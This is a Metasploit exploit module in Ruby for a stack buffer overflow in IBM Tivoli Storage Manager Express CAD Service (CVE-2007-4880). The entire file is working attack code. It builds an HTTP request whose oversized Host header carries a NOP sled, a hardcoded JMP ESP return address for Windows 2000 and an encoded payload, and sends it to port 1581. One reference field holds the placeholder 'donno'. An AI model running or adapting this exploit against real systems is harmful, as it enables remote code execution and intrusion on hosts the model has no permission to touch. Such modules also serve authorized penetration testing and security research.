##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Windows::Http::Tivoli_cad < Msf::Exploit::Remote

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in IBM Tivoli Storage Manager Express CAD Service 5.3.7.0. 
				The web interface does not validate the length of the HTTP Host header.
			},
			'Author'         => 'Muts',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1.1 $',
			'References'     => 
				[ 
					['CVE', 'CVE-2007-4880'],
					['BID', 'donno'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 1600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Win2kSP0', { 'Ret' => 0x77D20738 } ], # JMP ESP User32.dll
				],

			'Privileged'     => true,

			'DisclosureDate' => 'September 24, 2007',

			'DefaultTarget' => 0))

			register_options([Opt::RPORT(1581)], self.class)
	end

	def exploit
		connect
		sploit =  "GET /BACLIENT HTTP/1.1" + "\r\n" 
		sploit << "Host: 192.168.1.1 " + make_nops(188)+ [target.ret].pack('V')+ make_nops(4)+ payload.encoded
		sploit << "\r\n\r\n"
		print_status("Trying target #{target.name}...")
		sock.put(sploit)
		handler
		disconnect
	end

end
end